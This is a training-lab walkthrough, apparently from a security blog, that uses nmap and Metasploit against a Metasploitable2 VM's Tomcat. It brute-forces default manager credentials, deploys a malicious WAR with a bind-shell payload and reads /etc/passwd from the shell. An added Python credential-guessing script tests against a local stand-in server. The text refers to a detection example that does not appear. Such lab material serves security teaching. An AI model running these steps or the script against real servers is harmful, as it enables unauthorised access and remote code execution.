Information Security (old version)/Metasploit 2016. 6. 3. 13:39
Metasploit - 08. Vulnerability Discovery and Exploitation (Tomcat Vulnerability)
This content is put together for hands-on practice in a training course. Please note that if it is used for personal or malicious purposes, the legal responsibility lies with you.
[Lab Systems] Kali Linux, Firewall, Metasploitable2-Linux
- Tomcat: see 'http://net123.tistory.com/245'
[Lab Steps]
Scan -> attack the Tomcat manager login (default credential guessing) -> obtain the manager ID/PASSWORD -> log in to the Tomcat manager page ->
-> upload malicious code (a WAR file) through the manager -> obtain a shell on Metasploitable2-Linux (as the Tomcat service account, not root)
Ex1) Scan '192.168.20.204'
- Scan '192.168.20.204' with nmap.
@ Kali Linux
root@kali:~# nmap -sV 192.168.20.204
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-03 14:09 KST
Nmap scan report for 192.168.20.204
Host is up (0.00022s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell Netkit rshd
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:34:5A:8A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.39 seconds
Ex2) Connection test to the Metasploitable2-Linux Tomcat server
@ Kali Linux
- Use Firefox to check that the Metasploitable2-Linux Tomcat server (port 8180, see the nmap output) can be reached.
root@kali:~# firefox http://192.168.20.204:8180
root@kali:~# firefox http://192.168.20.204:8180/manager/html
Ex3) Attack the Tomcat manager login (default credential guessing)
root@kali:~# msfconsole -q
msf > search tomcat
~ omitted ~
msf > search tomcat_mgr_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) >
msf auxiliary(tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
~ omitted ~
msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.20.204
RHOSTS => 192.168.20.204
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > exploit
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: admin:manager (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: admin:role1 (Incorrect: )
~ omitted ~
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: tomcat:role1 (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: tomcat:root (Incorrect: )
[+] 192.168.20.204:8180 - LOGIN SUCCESSFUL: tomcat:tomcat
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:admin (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:manager (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:role1 (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:root (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:tomcat (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:s3cret (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: j2deployer:j2deployer (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: cxsdk:kdsxc (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: root:owaspbwa (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: ADMIN:ADMIN (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: xampp:xampp (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: QCC:QLogic66 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tomcat_mgr_login) >
msf auxiliary(tomcat_mgr_login) > exit
root@kali:~#
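What tomcat_mgr_login is doing above is nothing more than HTTP Basic authentication against /manager/html with a list of default user/password pairs, and reading the status code Tomcat sends back. The following Python script is an added example (not the Metasploit module's code and not from the original post) that reproduces that exchange end to end. The Tomcat side is a constructed in-process stand-in, so the script runs offline; the account table (ACCOUNTS), the short candidate list and the port are all assumptions made for the demonstration. The one detail worth knowing beyond the module output is the 403 case: a valid account without the manager role is rejected for the manager app but is still a working credential for the box.

```python
"""Guess HTTP Basic credentials on a Tomcat Manager URL the way
auxiliary/scanner/http/tomcat_mgr_login does.  Added example, not the
Metasploit module; the Tomcat side is a constructed stand-in server."""
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed candidate list, a short stand-in for the module's
# tomcat_mgr_default_users.txt / tomcat_mgr_default_pass.txt wordlists.
CANDIDATES = [("admin", "manager"), ("admin", "role1"), ("both", "tomcat"),
              ("tomcat", "tomcat"), ("j2deployer", "j2deployer")]

# Constructed stand-in for the lab box's tomcat-users.xml (assumed, not the
# real file): 'tomcat' has the manager role, 'both' exists but lacks it.
ACCOUNTS = {"tomcat": ("tomcat", {"manager", "admin"}),
            "both": ("tomcat", {"role1"})}


def basic_header(user, password):
    """Build the Authorization header Tomcat's BASIC realm expects."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def manager_decision(auth_header):
    """Status the manager's BASIC realm returns for an Authorization header:
    401 unknown/wrong credential, 403 valid user without the manager role,
    200 valid manager account."""
    if not auth_header or not auth_header.startswith("Basic "):
        return 401
    try:
        user, _, password = base64.b64decode(auth_header[6:]).decode().partition(":")
    except (ValueError, UnicodeDecodeError):
        return 401
    entry = ACCOUNTS.get(user)
    if entry is None or entry[0] != password:
        return 401
    return 200 if "manager" in entry[1] else 403


def try_login(base_url, user, password, timeout=5):
    """Return the HTTP status the manager gives this user/password pair."""
    req = urllib.request.Request(base_url + "/manager/html",
                                 headers={"Authorization": basic_header(user, password)})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.getcode()
    except urllib.error.HTTPError as err:   # urllib raises on 401/403/404
        return err.code


def guess_manager_creds(base_url, candidates, stop_on_success=True):
    """Try each pair; keep anything that is not a plain 401 (200 = manager
    access, 403 = valid account without the role).  Stops at the first 200
    like STOP_ON_SUCCESS=true in the module."""
    found = []
    for user, password in candidates:
        status = try_login(base_url, user, password)
        if status != 401:
            found.append((user, password, status))
        if status == 200 and stop_on_success:
            break
    return found


class FakeManager(BaseHTTPRequestHandler):
    """Constructed stand-in for the manager app's BASIC-protected /manager/html."""
    def do_GET(self):
        code = manager_decision(self.headers.get("Authorization")) \
            if self.path.startswith("/manager/") else 404
        body = b"<html>Tomcat Web Application Manager</html>" if code == 200 else b""
        self.send_response(code)
        if code == 401:
            self.send_header("WWW-Authenticate", 'Basic realm="Tomcat Manager Application"')
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the demo quiet
        pass


def run_demo():
    """Start the stand-in on an ephemeral loopback port and guess against it."""
    srv = HTTPServer(("127.0.0.1", 0), FakeManager)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return guess_manager_creds(f"http://127.0.0.1:{srv.server_port}", CANDIDATES)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(run_demo())   # [('both', 'tomcat', 403), ('tomcat', 'tomcat', 200)]
```

Against a real target you would point guess_manager_creds at http://192.168.20.204:8180 and a full wordlist; the status-code logic is the same, and every attempt lands in Tomcat's access log as a 401 on /manager/html, which is what the detection example later on this page keys on.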
Ex4) Log in to the Metasploitable2-Linux Tomcat manager page as 'tomcat/tomcat'
root@kali:~# firefox http://192.168.20.204:8180/manager/html
Log in with 'tomcat/tomcat'
Tomcat manager page login succeeds
WAR files can be uploaded (the "vulnerability" here is a default account holding the manager role, not a bug in Tomcat itself; the manager's deploy function is working as designed)
Ex5) Upload malicious code (WAR deployment through the manager)
root@kali:~# msfconsole -q
msf > search tomcat_mgr_deploy
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) >
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat // in current versions of this module the option is named HttpPassword: set HttpPassword tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.20.204
RHOST => 192.168.20.204
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat // in current versions of this module the option is named HttpUsername: set HttpUsername tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PAYLOAD java/shell/bind_tcp
PAYLOAD => java/shell/bind_tcp
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD tomcat no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.20.204 yes The target address
RPORT 8180 yes The target port
USERNAME tomcat no The username to authenticate as
VHOST no HTTP server virtual host
Payload options (java/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.20.204 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6070 bytes as vWzzfJQnXBNpnKWRqgDlpvtW.war ...
[*] Executing /vWzzfJQnXBNpnKWRqgDlpvtW/80DdE2UD8LI6z1F7aNIX34OiaC99nM.jsp...
[*] Undeploying vWzzfJQnXBNpnKWRqgDlpvtW ...
[*] Sending stage (2952 bytes) to 192.168.20.204
[*] Command shell session 1 opened (192.168.20.50:42280 -> 192.168.20.204:4444) at 2016-06-03 14:48:15 +0900
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
hostname
metasploitable
dir
bin dev initrd lost+found nohup.out root sys var
boot etc initrd.img media opt sbin tmp vmlinuz
cdrom home lib mnt proc srv usr
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
~ omitted ~
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
exit
[*] 192.168.20.204 - Command shell session 2 closed. Reason: Died from EOFError
msf exploit(tomcat_mgr_deploy) >
msf exploit(tomcat_mgr_deploy) > quit
root@kali:~#